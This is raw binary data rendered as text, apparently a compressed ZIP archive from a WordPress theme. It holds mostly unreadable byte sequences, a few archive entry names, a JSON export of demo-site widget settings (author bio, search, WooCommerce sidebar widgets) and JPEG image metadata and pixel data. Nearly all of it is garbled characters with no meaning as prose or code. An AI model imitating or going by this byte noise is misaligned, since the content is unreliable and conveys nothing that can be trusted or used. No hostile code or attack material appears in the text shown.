�N���S�k�9wS�n�f��3]w/�$
ꡇ-�k}1&y3�ׅ��am½��efyD)=@�Rz�����
�4�_�����A�e�#�?	���2��*�ށ�������ٍ�������-w��z�c	��3��\�#��%8�+�}��c�	�*g���m���nu�������3ܟ��O�T��{�ŷ�@WE7��
t����f8�oʹ�}褲�!¤�w��
�޺7Aױ�9x&�(�뗨��x����|��6���a6ɣ��|2N��,Y�PA�V��XC�9|b�(�&�%��UK�.d�D�Bڶ�U�/�o;T�].�K�<k�EKn�Հx�Ӻ~�0�X����o��*�X�s|�RJp��;+��֜��Т���uԾ9A��SC`�H_�?���/���y��ZUT�"�t��/8/�Ǜd�V�`��q�,{���t����]*��=��*�#�~�ת�4�u�u��վ�OO��X���{;�\�E�+Ê����BB�8��ݚ�b��uِ�pu�{�~�/����Ņ�o���]o�_�����Y��*](X�mb6���7(	63i�&����Qp�G�r����<�u����8eO1E\ BK(�@�(�R�^߭֯��7Q`�ph��a�Ś�Ѯ��i_x��vEA&q
Q0h%�\��*����&�'�h0�zZꃧ�Z�9����%|�j�F��ق��Q
*�hp0~g�~�/�����ZD���Y�����]�������v}Mѣ�>�g�����k�#ּ�`y��g�8�6IhE�	�^O*Ħ�ߜGD�CWE,��O�y��&�dkn��ox��[�*���gAQ����Vu?F��/�Ay��_hd�*�-���S��K���ű
��h��s���RԻ��ߟ�i�W����+Z�8�!�h�~��pM���RHcu�#��\>(_�N��9WW2�bfy(4?�e����p���-B���+�4���C��,�q��d�=�.f������.��}F�r��Q�NE�?"�
=�3`�ʨs��S�WJ �˳��q�6�;���lq=�I|L��%)�����dz�7�)Pz��^�wÙA^��*bj��g�xD�?�a1�So�H���2u�2ĕ୷ K��@�����^����c��T��'?�d���ը5�td�sT��/����~C�Mh+f?����酦�`��y9Gk�O��'�n�b��2�I�q��ɮ���MY98b�MqmuFk�]"W��g-b����rp|6��݈���hΝP�I���Wu���U$[��U%�i���qĔ��%���� ^͎fs�%,‹���x\�P�1�@����{*ҿd\��T}��T��� @a�7B	���k�D�:GL�7来����,C����[\��4V0�*���
�)\5�ɠ��pF�C=*��#��;֤��- �c|D��r�팏�V�Q�1�-Tz&tJi�����SH:�i�^�j�`%���I�8(��������@#���P�y�O����vi_U�PX–$�"�l�qC�1P�� U���M��y�M#���H��n�Ze�{���QK�3��y�8�����rS�b
sh�
��~�ë+��!�`1P4�Pd�U`���2�������;�J�'"�]�c2�Ά�H׬W��Q���PU"��r��$�E`�%9���)���b�V������%��� ���d!�ٜQ)���6vf���c�&��*����ԲQU�v���y7��X)�oP�5{���;e�n*�g���f��+�U)T�R0�\Z��eV��}�Hk�����ve��{D��^V��q�6~?O8���,�����hT��&�Ѐ����	��Z�2la\蔩�ҍ�܍��A����ƅ�
��22e�#x�ʩ��3�2N�Ŗޏ�*��!_r�	�"��+Ⱥ�����WO��'%���Ŧ��Lh����,�$'.鱰�S�,/j/E����+�s�Ӈ;�G��UJl���S��)���p���J�N��=f��x�	�7�eƏ�?�;�'M�6b:���S;�J���1�Z�:�Wm��t>��1�ʡ�G�x4�-�k��p%�����-�~����>���B��|v�X-��LX$�6
�3<q�+	�]Ѐ��X�3�R�=~zD+���t��jYJ�A	�J����B�U]MN�7Si�n"��m���Cã^Q5c�	{��P�L����,r���i��;HN]��s�/�-�f?��ACpE��U;|yD-b���M�FoD�`9�[��W&�@#�]P��� 31�l#{�N�7�(D��0!廅1��(������/"�,��Kf���
2����WLͿk���CW�R]_s��t����B%Q�t�V_-o]��.ugF�Ꭿ��rą����/LR�"�<b�sȊp��ʤI
 \PZQ�/�.�@�L���/m�	�]�������h�
��/R␎Mr�[�`gZe����.����{�
���K��%%���ǧgI
�l��@����i���L?�Rp{���jVԣ��y����y�{�̰����]i~�t��B:�(�B&����e���A{d�"�gKkb�l�*u�.�$SPǗow.r��u�e|�J��C"�ꌧ9�8]��L����a%������+/��b�_��������8�n��ғ3s�f�'��$��b"��E�@VYM4S�T�c_S���!�PIR5�/a��#(FW���8�Y���[U���P����T�p`ﭷ�����
̥����:l��bWm�BoT)>���G�ي0�0)���y�T��of|T�~<�>o/�0���ǀH�;'�Za�PQ���V�V~(0��Q�F*诐x�WI9%���vh�?u.,����JL-7؞m�w��o�녒a� ��[��<��Q0{�<�ܲ��-u�o.6*h�nm7'�M�n���ږ_���S�6�vk�+;��z*���0�al�yy�8��+S�P�Ɲ����b���Tp�ZC��p��''u�x��_a�_�.g� ]�4���`ÜK�{b���$&�
w�t7Ίn)=KT�gE�§a��aP�e`TfG
*H�n�`]H,B
4��@)I������0��5==�uPV��-.���A�4���5����*�/���
����=���g{���nY���6�X�ҧ_Ֆ�v�s���p��v�rz�(�J$Q��-⥣�\�'�>~t��.��5�G���#�	��0X,A	b����EoMj�Eo%�6m�/W3M���C@p��u��F��c~ϼΚ\ ���w�x�V��W'�����x�?B�Wҿkơ��Z�Č��E�y�M/6E]DvM}G��f�z��ǫ�x�4�E�2u� �$�t�|̔����f�K���,�ᡡ0~��G#�" ��vJ�-��g�_N����E1���I�$���!�~S��p�6��~#��^���sC�oXZ����=W& G�.��;�R�4�����Ί`4�G�iϓ�mVgZ���1,�#�:$<�>Be�lޭ܍?�n�Ӡ�P Oac�d���ZN�gV�_���X�T��s٧\��<h�º&>�X�����q������b�׸�]HDAo�kM��o2�pa����d�(��z:�qI����B�U:�^�	m�P�q�0N�b>��_Z�9G#]�M��M�n�y����V|SaC��Ib�	����Ӝ{ߒ]ŷ��b<Bl�q��>5i��l�7ʂ�Kl��YwH��h�ζ���3D:��퇦4��K
2��!bщ�ޕ�קT"m&V9@����F1SλN�5u��=}s:+<�G��Ǩƥ�������O[�^�:�(�y|q��>�9�a�\����6$|}�)��dk�BR`��BL��Z���蔫�c1�,pu	�!��[!Pȯ�1Z
j�Ԙ��F�Q�%�
sd#��&��A��7���P�[1���[�(�!FrA�%�(�)l����3͙���&�%����*����Y���PhL�g��g�e:t�HJ�)h'�zj	⼯ܐ�utG��+��-�����J���%ۣ�ɀWρ����`B�-yn�/�(����:��d���+3R�����9��3��C�wJ+V�㡡��;G��a�X���ܙ+[.
��kli%ѳ 14�U�خ��BR���dvSqH_`0��#������Z�m3;��\ZB���y�0�}�l�:����`�v��ה�He��鿯�}��s�
!��T�vٔr���J�-K*�9G�47�.W��f1F�>Ɖ�����QD6IrK�Eds�)^�����5�hTvy���jeC�b�(���t��J��6� 0�bzqX�� ��At%v���H��R�k�ꔣ8J�29O���?]p2Z�Ux�g�g��k����~�e���?����_���؅�vl�����x�uϐ݈Ԙs�åN����]�ζT#�^��VtUU�<�Hc����
�����Æִy�_�d��v:]A!�֕�U��l]�7��~���Q�-�3����c�r�n�W��``�6}�����<aIXz�;FYT�\�'��M���>���,gӥ�v�{����:s�:
E��38$6�#�SZL�l\!1���e?�H��AL������#�-����G�R��l�#���dz_<
Y��7�do�Ϻ-��+bk�~ ��B�?�<=]�����u�]�G��䉽R�[�{d��
��)�<���x؊�W�H#``��6������?H����� ��d�[:Hk'�ܴS8@	9
8��pѧ�H�X��""�v?���y>������
��B?�Ǒ*�y����PN�7O�J�b���T���&N��<h�H�5���˃»x��L��+��U�qy��都w�:]W�݅����K�Y���ojGzΌbs������{�jN5Mi��n�"T���"n<�|�(���+�v�eC��/n�fF�Q0��+��&%4���e��{f��w��=����q�.۹��/\�Sn�s�G�{��ٖ�竱s��g��,�g1}��+�
���y4�f�����o���m+n���6\��'��n6���{
��T��T�g>��6�#֌�0y(��K��n��cc���:L�L�H�[a���z�FՈ��jg��˹<�z�ݨ=�9
�I��=y�Ƹw�&�4��m��W���ч��?��"O������a�=!����!-�l��V����)��q����	%��_A0rvp��,��K���i�ڢ��x٧s<d��̑���"n�[�u�Q�j��/�vi��-�8���퐯���
�,3���c ���1��c����B����˜4J�2z�Z�J,�4�^�ߞ��3���e��On�(�pʣe�M;�s��yM�[���Nl֤�<[�$�u�ˑQ�/��	`N'��P����EۍV�,�Pk�P�_�R��9�
}�X6�do�vb+\4�g+]�"�;��ڶS��E�J�k�u��ޟ��憶�6�O�f6�[���G�e�x�"ƚ��)�^�.�@��6M�#������麷���"�6�ĝ�D��т��г>�1Q�@��)��PT��i�	Zx�RϰJR��Qq���G�X�\=����ʳ+�E���n�F����}�t�
=}&�tQU��4�v���F}�ZS�7�[8���v�Tܵ��c�d���i��ޡ>m	�PXf\z@���ԑ���{%Ey�r:��9`����P���r!�Ki.�X=2Ӕ�x�j�'KŐ�kb
g�'~~(\F4��[n�YY��=#ϰ5����"!�l�����syt<����W���R��
g�5o�N�~����\2EϽ��s��;/�u�[]g���+*�-����q��S�X�Ȣ�I@{�\e��=�����pI.�9�@;׌K�?�"M��;�diK5wE9So1�6��(Z�/�7�*YU����_�	>�Ra-~4��AN��zSuہ\�0��{�f���-r�v�\�n�ҮaG �D�;�ؿ����K�.�$���{h,Ƃ��,pɒ�jR�>��=M�������6��Ϧj��,�u�g�69�{�&���wbP0�7�
U��SY�x�Wo>�	r��G~0�'�u�Ή�
"��q��b��*
W���(�䌜�_3�I�/	���yY\o�?4_���m�%
2�.
Q��Z�%c\�[�P��Hm�fkA�L�ܷ
+��Jх�T��()Q.���,��o��rL�p�bؾ��9�f��nu�i�;Y��(1{����ZAP�)����ĸ�q3��W��$�>�pn�Е#y:�zu��>gN�!���W��u�m�h�g<��63h�g:�u����G�u,�T��z45L�̒+�U2��4��W��ȟ�eLY�[�ʁޏXI���x�i&�M�;��V$�f�0]��5�C�紝�K0t�Iw��>��w"��I�*�򫒔<�,Zd�D>�Yz�R�U� F`��xf*���c%?Aa�u���>%I��>%��Tʐ����mY�e4n�R�_5�G}/!���-��
�@�7�����>���c
.���̩JL��*_˺[�O2v
/*�|����^�,:U�(:e�g�M�RXm=���p�~W'�3�Y�����C3�|�rP�������ud��o�V���a2Sw�:Q��١ʼn,���$��pP̀B;.�h����X<��3f�X��	6�K*�W��3*�-pL{���™ɞx�W���&��ŗ�ۄ;~��['v��\�`�QZB	�q5���!R'?��*��V�I��ٍq�Z���d��z��^:�P�m��+����ҁ�I�EВ-1�<תp;\����+��\���!|��4ϧ�ka7�7��X�����A�M��������}�5�Q�Ȱ�{����G�Y'ō����u������ǔx��8��Y��R=r*y��[��C�O�l�ñZ�Ϥ��I�E�����Պ����P�Q'�ڂ�[z���J�v�A��������
:�����^��
t��r�7�e���N�C�>s�y�_V��R��M/�Bۡ�_��� ��c���Tz�ᓞ�=��ӓX���4��?��d�$����i ��$1v��
�4��
Js�:H��-fS�l|������_�{���K�5oy�ג�y�.��o]�^��:bM�0C�SI���YM��zj�9.�B8���"�!��ۏH�z\kb�Q>�eG���[��*��
�K�8��?�
'DB�S�g�̃�]ù�d_��VB���'ƒp2�^�ݭ���Y ��&��	���B�
�&�[e���~:I�r��f6��fh�;l.���'��3�P\�z,A�pA������8�;��6k#�v˃����Ën �l���)�Ն-��r��OJ����O�0�ͰaĒ�l@_cJ$Q�&Z<d���'M����t���7V�ʿs���]�w;��<jy~��tG#�ƴ����?���^á��[&�0��_���{e��z,�%�fy,��ߩc4]���Ͽ7@�WZ�ņe�6u��l�1��	��Z�o���y�۶"�c�lo��,a���X�rX����]�_yo���R#�~�o,���1�'���uw%�&���|ͻ�T�v����.q����o��[f�Wr00}���3嚘�	�?r
��.Q'U��O�2�yd�T�'���"p�3m��m�/�����,a��(���0]��{�<�q]��{~��7�-&*E�+'�sG��9�q�~�O.�4FM�ʬ��`�5n�R�/��=þ.�����.L�X?	�����қ�U���th�	s�.�sT�r�hvg\G���w��k'�� H�ڣ�����}�e�F��S���y��+	�yz>��w0�@׽LiM�HY�O���4Y�YR�Ӳ�a��z����1h�ܽ��	�a�R��PDq$���-�g�{qft~���AP ̈r�氤p�ƫ�Su��41u�7�p�wr�s�p�х�ߒH��Bw�<��l��ᖋq]՛޸�1�m$e,[�oC����·Q*��#�ނ$J^��������l�C��\{}����?�8�����+���jL�t�jd�ܿ��>�D�i��s�s�J`Ԏ`ɏB��Nx��oJB[�X�/���
��Oäk��BE�vJ��Djn�p"�Gu�
��F�:�2�;�(�F���V �&�E:��a���#�a5�,�DjC*��9QP���3�i�
�WWb.�4��_��z��pDغ�m6�O������mk7i'G�hy�ek7���h'�T�I��8]s�<誨o��o�8�UQ��2Ќ�Ȏ�\Q��s'
x��Y��nZQ�u%D��w:e�h��ٵ"���s��J���,���7Kl�7��fbZ�*c�'m4�$��:�Bg
��r8"
�4�C�
��f�(NrP��5S��/��/3�	2!���d!�,��Q��rZ��������m\�gEVc'G�^��:�'��ڕ��YUny�Ff��бQ��ˌ*c��}YX�U��b��F�E�y&/%'z:�"�t�Ѥru�R�����!ѱ����_T�2+�2����X��+*m't�y����Q3i��y1W���i,��g�l��hH5ju����F�q��:�j�;xl�O����G�pb�ɠ�v���@O�9��൸���2񆾈c�피YsL��I�r[Nc�w�u�D�̕��0\���˃�PY:��d�O���:��+=�Y��
q�������	���w�RP�H��8/�O"���N.��<D(�\�Xr��8��s�ἣ�Y‚�5�9&=.0L���b����Z�*<�)��##*��g7Mpt���D����Tپ`r�O�<�'��nV	�T�La@&G��<߿�{G':���HM�����xӔ��E�DcY�9�� /Sv*�|��,9��JT�|��aYRI�&�d��*�`~Vb�ya���.a����̽����W�hXh�=��|ƌ���F��QNS�]�e�uR�UТ�:�n�����/5i�f[�)�%����Ƞ�sxc�(|^���)`�oJ�>HϪ�˻�lq�"%:Qn�33��[
偘���sHR�nBs�U�毣L��h�L��b^��ɠ�J���e��9E��|!'�p��89k�Cb�i�֫f��+:)�ˉ�W���8��PNv�`�
�F�>@�.�PE'i�ܤ��Nq
m����ҿ������oR�7@ϏJi�~|*��>��zi5�b�TH`��S���Y�
Y5��X@�6��F���)�W]�<��Fk�4��Z�,�w�<��q��3�2�+P�u�N������Q�Ǡ��b���ӈ��νC�:�4J�Z7,�d5w���0�XЪ+&I��ߧc�Pƣ�u)?���q�#��=�jIQr�6o{�2���6�Z��H�}.O��)�~@�,�DI���Ҍf�yR���a�8Z�2g��$��ۦ�X�4�c��s��e�3�VԦF�H>���T N���.�„yҌH�Z �H���5�0��+`I��>\)'�b���Z�vY>�Me2������UӤJ��%��~(��8���q�b�0Ѐ#����'��kC��w� �nh���'�v��M�����d����seP%c��>�#j�0�0V1 F�Z(ߥ���->��_�}�;ݢ�v��J�Z��x�Q'?zL�V f)ΐ��&�1L���f�^��6v��2�5J��%E���*0��GS{\PᨣYJ�a�q�:������ćFK+c:`oږt�(m���8���V -��DEf��l���PH�t
R)T��&�����U70D�YZ\�#U\�‹�$��m�α\���}P$d{vŠ
Im��hm���I¹�fj�&�0%�Pt�:���5E��8�:�c��7���Sq[@���e�FM���r�hYEl$_�)��r,X��X$�!L[�����@LN6���cNV�zl��L3�����y0�2U�*l��pԾ�)�^"B-1~`�6'7[+�R@]��c��>�
�U�.��@�ޤݠ�d��%�@����yӦYi�/+�ρ��k�_���r�\���T�pVɇ���h�IF��\eZ�m�\���U��q�{�+���qݚ'��δ��Ac���l��/���V�4�����b}܁���$jm�K��M
Aoc�m���/|��@_=�s�3C�0l��?U
Z�>A@<޷Xd=��.�k;�(3�޾7X,
�[��rA��?�#�{@Ĝ�hk�\�6��I�������>	!���
��a�*���D�1F���	8��,�Q���$My�z��h.�P1��#�?l8�@k|�nk��_7y{��g;�m��n��ܥ�T�H���'�Ѫ�C��b��_+W龉X����U�`���O4Ī'�:�����`��>�B��=���UoLP���Kt^��T~ٿ����4�3��|�ʹ��LtJ_�H��ok�բ�dO��n{C����+M�=�����h�o���d���j%m[Vqյ��Xw�xv�eǁ�2+y�9���A%��/��LYpIP@��m�=J�|=�:b�f@�xqU�{�n+��oS��g���kbp>�:�<��lMOiF[�0��
�hA6a�4&�Z�ѵ����ad���O����(\��Y�}MG��X�[Mq�?ݳ�:A�� �$(؊a�R{���B�Ru#\ӌ$���ͺ�Yq'�#>�'5���[���-�~3t@+82�W�s���m��ᗄ�'��`j"��Q="���iCR��&��V\�A_�?�C5U��b��>U�W��{�o̒|>�������y���a>b5�OVc0yRKiݍy��R)5��ݠ&��vf(�/�i������.V[]�QV�mv�ԛ�����^�iS�֦��f��6Q����C���B=�����2FhM|�I�'�_~w-���[���������ZQV��vU{�T[i���.]�I/6�u5�4�=,kk)X�A�Zh�^O#e�"9��'&<�m�vF���5i�ׯ|=ǂ�&V�@����#wʊ�23_�ӟ�_$��L˔��\n�~�GuY	��T��3A2�⫙{ ��?�F٧Z1{;(X"��	�/o	�Vl�W;�#�/�]�ͅ�gu�I��}(Hk���ى�@����f�Մ^i#ũaYu� Ȓ���kV�1S��ҭ�b�鱫.��m��ݺ=�Bpg;�Y��yǵ��m�ijJ=
jE?�	+�R~�VN+�U���}V�o�f�m;�^33���$4��v�=7���
��m;�FKi��*.+��\��a�컒;9�S��3%�~7=ŭ'0ԿQ�̑�x��+f[��0���hY=Ś}+���Wc�FS���C_�o�3t��U���:�4ud�j ��j���V���{��q��#"NJF�V��XLo�;
=�K�C2rK�|pN}�=�!��˞��.��b_�T���-��Ō�jT�fT+�ϷYn�M�^��f��6�W�'P��<D.��M��/N�A}��37�L��z�5@yR���p�Z[�l��d2
���u6qL�cv4>����\�w+`�ޱnF�op78>
��M��%��]!�$�\	$4b�,PC~,9}���
����v�ߴvN��	��P㣀�1I��G�*9j��F`�nU�ob��jK�l��/I�a̔d*�x��9�2�?/�}��K�/�#=xKm�8��NR��q�ᷡw���ϳ����y]b����^��A�9~9G�� �$半C�[��U\+v�`'��ؖt��ޮFٿ�y�>�)��B��l�&~�{�6j��$�ƅ5뎛�?�|���Ü�.���N�G�i��&��i���G��=��v�ჽ�����ν|�����ʮh	����8��
�Wy�\��#5���߃x?&�5�Ǡ�B����t�!wBU��—ե��R�]MWwk��8�B�j�!�՗�JdH7ĩx-n]̱U�G�}A]�Ͻ���G���ݫ[�/���N���W.A@�������2�c�Z������
WЁ���B}�K.A�k��z�t��‚e�].��[�>�V��+���l
���/6�?�Y�]"?/� ��8�z��������j�yڍzԭW<��I��񼯲���US���u�-wE�
�!�W#�AT	�`�R�)�>�������9�ݸ�
�%5��5�O��e���X��oA�O�8�[+E[}_��&���g������ܼ���Zh�N(�����񡽃}��%��·���xbu?tgVK�F�ky��O^��"N�^y�	��ղ־��s)���:��:��G�?��VS����x�[���
����~�	u��Z�4�cs��'��H
���Cɍ�j���7�<�3��P�����W<W���;�'����?HWv�^�'�{��\G4:�N�\a�Z(az;\�p+6'л@�s���|�����%�k�vĵ�2�j����}1W}�:�c��:�a�:�tN��1W���x�U�ˏp�q���p�C���EW��c�{�u�G��K������U��7���I	�A嘔�N-9Kʢ�Qi���1#�ܦ?n4t��xȝ������Swq�K�su�y�V�W���?����9��S~=�W�v������e�@f����jg�fin�bio�_Fڬʖ�6�OjeqUlK��]JR�k�}�m�ؠ�\N��.C\��iQ|�j����N�$��2�E2Ū#L?f��A�-�5�mfU�x&�e�ť�ۂ�̞6���!���I]>ف��A
[ɚ���J��s���W���S���tù�r�r�ᆓÅ.O�Ֆ�NI��Q��xC�Z!�!��}kC�I<	JWW�q������'���϶f~E�[���mc�i�"ˬ�%�Il[��g)�cp�����Q�Ii,�X5:[
�c�@�$NEK�'�Qb�Q�c�M�6�8hJy��{�Σb�L��ÇW=�`�DZ�E���a��%�M�W>�ތ�ٞj-GVuaV��m8^($��\���IZ���rI�0�:�,�\��<�0�]�H�fC��k��*j��Ez@�'��c�%���W_�f��1#��n��cJ1ƛ�
3���	�vX�6oNHh����W'q�+�N�Apf��rd!;�]����㳋L��.�lq���=$sr�y�Ce���dS�8q֟��E|�~,r�T���@RԿ���e�J`G�����{��*�*���/R�����]�X@�cpu�{O�4���7��ݺ&�/��������4�=N=p�9z��o���k�C�?�����O|<?@
Ҁ@(��k#!)2��f ����-�hikhn�L���@��H���bFZ{[Sf:+���(�/W����@�M
%�Vc���P��ƾ�\��
pj���b�?�1��j�������@��N��������ߚ_A쿾���5H��O�PK
|��Q$sliders/
 ������������}����PKg��Q:�axB��$ &sliders/slider-1.zip
 [������;�����'���PK���PK�8FZwQ3��!inc/backend/data/main/widgets.wienu�[���{"primary":{"author_widget-2":{"title":"Tina Moriss","text":"She is the CEO. She's a big fan her cat Tux, & dinner parties","image":"http:\/\/wpdemo.archiwp.com\/maxbizz\/wp-content\/uploads\/sites\/7\/2020\/09\/author-widget.png","facebook":"#","twitter":"#","google":"","linkedin":"#","pinterest":"","instagram":"#","youtube":"","dribbble":""},"search-2":{"title":""},"categories-3":{"title":"","count":1,"hierarchical":0,"dropdown":0},"recent_news-2":{"title":"Recent Posts","count":1,"posts_per_page":"3"},"tag_cloud-2":{"title":"Tags","count":0,"taxonomy":"post_tag"},"media_image-2":{"size":"medium","width":715,"height":794,"caption":"","alt":"","link_type":"custom","link_url":"","image_classes":"","link_classes":"","link_rel":"","link_target_blank":false,"image_title":"","attachment_id":452,"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/wp-content\/uploads\/sites\/7\/2020\/09\/banner-widget-270x300.jpg","title":""}},"shop-sidebar":{"woocommerce_product_search-2":{"title":""},"woocommerce_product_categories-2":{"title":"Categories","orderby":"name","dropdown":0,"count":1,"hierarchical":1,"show_children_only":0,"hide_empty":1,"max_depth":""},"woocommerce_price_filter-2":{"title":"Filter by Price"},"woocommerce_products-2":{"title":"Best Sellers","number":3,"show":"featured","orderby":"date","order":"desc","hide_free":0,"show_hidden":0},"woocommerce_product_tag_cloud-2":{"title":"Tags"},"woocommerce_widget_cart-2":{"title":"Shopping Cart","hide_if_empty":0}}}PK�8FZUνܖ�inc/backend/data/main/home1.jpgnu�[������ExifII*��Ducky2���http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:01801174072068118DBB8F711C24FFAB" xmpMM:DocumentID="xmp.did:F1CC2FD8467F11EB916DDA90F69614A3" xmpMM:InstanceID="xmp.iid:F1CC2FD7467F11EB916DDA90F69614A3" xmp:CreatorTool="Adobe Photoshop 21.1 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:21f813cf-4116-9145-9d52-8b49fbcbf73c" stRef:documentID="adobe:docid:photoshop:3d2b9575-2c2b-3544-9bce-a5b066c08568"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��Adobed����







#"""#''''''''''		
			




!! !!''''''''''��#�"���	
	
s!1AQa"q�2���B#�R��3b�$r��%C4S���cs�5D'���6Tdt���&�	
��EF��V�U(�������eu�������fv�������7GWgw�������8HXhx�������)9IYiy�������*:JZjz�������m!1AQa"q��2������#BRbr�3$4C��S%�c��s�5�D�T�	
&6E'dtU7��()��󄔤�����eu�������FVfv�������GWgw�������8HXhx�������9IYiy�������*:JZjz��������?�f�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf$S�vl(mv�h�����#�{���uw�Z�b5���*M�k���x��Jcgr� �e�Z\с�(�b'�Ƃm�#�>tе�R	\6���u�Y����(F��?�^����)L��wdBo1Im��O������3dZ���%��ՙ���� �,\RR��L�r<�gn,{c?�H�3Si>������+'g�$���,̀�}R
kL��m��8.�KN�$�~�+S�n=�n*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*��H˫\if��k ��
ˎԦ�kǶ��$f	����Gb�x��qDHV[�fȬwt�5kd��ĭtX���,������}��̾o���#�Emd
��N�9c�`�	��$ő��ݦ��w�����(b�y%*�Ǝ��#���Q���S���0������!�U�134l�~�8�#}�VU�"3\���^�p��EA�zS�hy������{�8z`��A��('ө�}C���M74�Y6l�-�W�,G䑿PqZ�)�9T�`�Uٳ`+��-�-�7�) ��)ə�4�C#9�2�!\���lB��c��3\�;�nlet���r�S�AFꬤ�)�08Ep�k����A=�r[t<*������+���\1��D�lH�D�c#
 �a����?�SNS"�݇�J�����������:�O2�j�(�;�Re_O�	������_h
�}p���Ȅ��pB.Z�"%�(�܆d,���䂥�$mA��V��6lث�f͊�6lت�X$�pF�S�j�[J������V��e�"��
y�=O�����c��,|]��+¼T���xO,�\G�O_��e(ԏ	"��O�S��W��[�����~�ҿ��F��Յ��e��g����e�S(�(j7�OP��NJ׭i���9՞;�ʪ�bj�Bʁ� >dZ���W��?�O�S��/��%1�-��u���O��7�m+�[���j�XP�l�(v���1�(�F�Ǔ���q�0�dEt5V��������?�KX��/��%|�wLR��)�EJ���Ĝ_�um���'o�,r2�������c�"<&7R��H�͛6X��ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb��.�{�LH�*~#�<1|�DJ&'�z&21"C��%�@�[�� -�@�w����gN��NJR��F�)�Ab�6f�a��	���HA���t�Y��R���l�Uv����Ɏh//cD�n#�PB�M�UG]�����X�a��.ⶵ�k�2J�V�b���p}M���ojMsfCC������������G1GS��JN�9MG���*M3���u��+ˑyu#Z��w�d�.hx��)]�	�vɾlUB��-b���N�I.8����b�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�͛6*�ٳb�v���L�Z��>�y��\�J������m�P�Ӏ�+u}9�O��%�QJ�
�f��(�!�,(�<>�W��r�X�3D`��qs�&+i�y����NJͧ�$�D��Y^2�v��j�E�u�:5��'�%ۉ�����MϬK�
�ސ��]�ŝK6X��R�c�FI4�i.'eqi~��h�	�
Pī�]Mi��?4�{ ��xN���*I������ی�9�V��y��=5����Y\%�����dh�䂿d �?h�%�_y��S�,�K��g���*�k�Z�\�p��w*v��lU�&���y�����T\�q�%���^c�)�(���6�:lث��Wӥ���cowV�"��Z��F��d��0��_�g�$��N�5���Kol�OE�ۯS�Y�5ϟe��S֓�=+uH�
�TI,�:HCq�Jv�ǵ3���D��PA��dL�l�d��{�y�-E����C�G,m$d�}^Kx�nr+n�p���A^��hu�;Go4���C$���#��(���i9��Uq�'9�����~th�~���>0��	�FrB�ط�;c���3��j"_�Xz�sLX\LY"���N��J�&�Վ5fuP��`,@��{튰�T��yi����mCh�h��'����
B����+-w�Vvk��.�8���X�$��*�#�鳀�5����q���>mc��D�N$z��٤%�1���.V��i��&z5��os�[�[�2�*8ш]�qU��ٱWf͛J��Y����gF�f�����d�1�c��F�r�<p�t{S�U��q8�	(_�?��&���Іh�1���5ɜ��R��$�#���E��4�+����K�g��)$4����a\F/%hq1%f�1>�I3�x誐=N��J/����?��&����M����?�T�Vo��9��cx�?�)(*irڛYL�r
�w��Vf�)���V�o^˜u�c��('�›�?D��I3��Lߢl�g�����5����L�V�:�G�R�[��������O���֌9��@�K$�RA z�ԯ��x�(�U�W���yw0�(˄F�"�ԟ>�f͛,kvlٱWf͛vlٱWf͛vlٱWf͛vlٱW�9YyYkee��Z͛6)vlٱC�f͊�6lث�f͊�6lث���v�ہ�wm����Z�4316�re���z/�rO�=�%%͒���)8�hpp 	9� 
ǰAP����8Q�j����]�X�g1Ɔ��̆�Ð���NlZ���WN"��W�j:��~�\G
�,@���O@x��4;�C�ɘ�q+j�td�00Ni/�6��u,�F;�'�"��fɅ�4����n#IBƎޡ�ܿe���R&���Dd|C�UO6l�P�8&�]���c�eRB��S�ƅf4PI=�4]~M���&k�L7�O
]Y9sY)��M0�|�gor����<��v���}.#���a���T��X��笋�=b��8��:��q<�����)M%%k�q���r%��X�*�Lw�A��B��JK�{u�'+HX
(Vfj�r<@����3e��ŨMh6XU�G��8Գ�
�����t��p�6��
��C��*�t�N�Pd2-��1�%�0j�2P|���斒n��JVCǗ�e�_��ݶnK�ay��X���X��Ӣ��X���V��d1�ER�9Px�V*�VbA,M�NV
Ӯ��m{B~�"�E�?	�ܕ��1U	!�1̍���
�CC��̘I�
>i?}�,��#	vGu,]�y��T
x���y�U�u�v�,��8��$)��G�BR�c��&l|��9~*����®Ǽ3D���H��,�9-z�fKO��%R�M7*cE�H�

�
R��C'�@��j�S52_���P�h�̱���zi��]�DH��"�F���N��K�b�,�zIHW�MQ��#����+�}��X�lٰ�ٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUQ��#<n�1��T�&��=:by(�<�cy���kh`�b�>�!�C�u���,�ӭ���)o<m�+���E`9+�N���逝�W��Y�"< J2& ˆ�A��&!��í��f���+z���-�q*��4����D�z���AA�Ŋ�����&���fI���UQ&wf!U@�I��?K����a�}Z��4�:L���Uj6�\UJ�N��5�`$�^�H�A�xI2�C���	�����i�K$7I0�>̪�.%ª��!�IߧB\Uٳf‡f͛vlٱWf͛vlٱWf͛vlٱK�e���S�4�1��+ycL��q�%Ll�e��r�o�a�᠎#ޫ�����q,�Ƃ��__���7��O�S64���z�ߎW��O��cAG�W�'�����scAx�z�������8cAR�E"�O�C�97H�6X�Fk�ɒ]���j0X��E�ƾ�$
���}������le�{*Ķ�+�ӗ�c?�,0��%���	R	:�J��L�@s�O?���?�IԮ|����4Q��$a��e1���
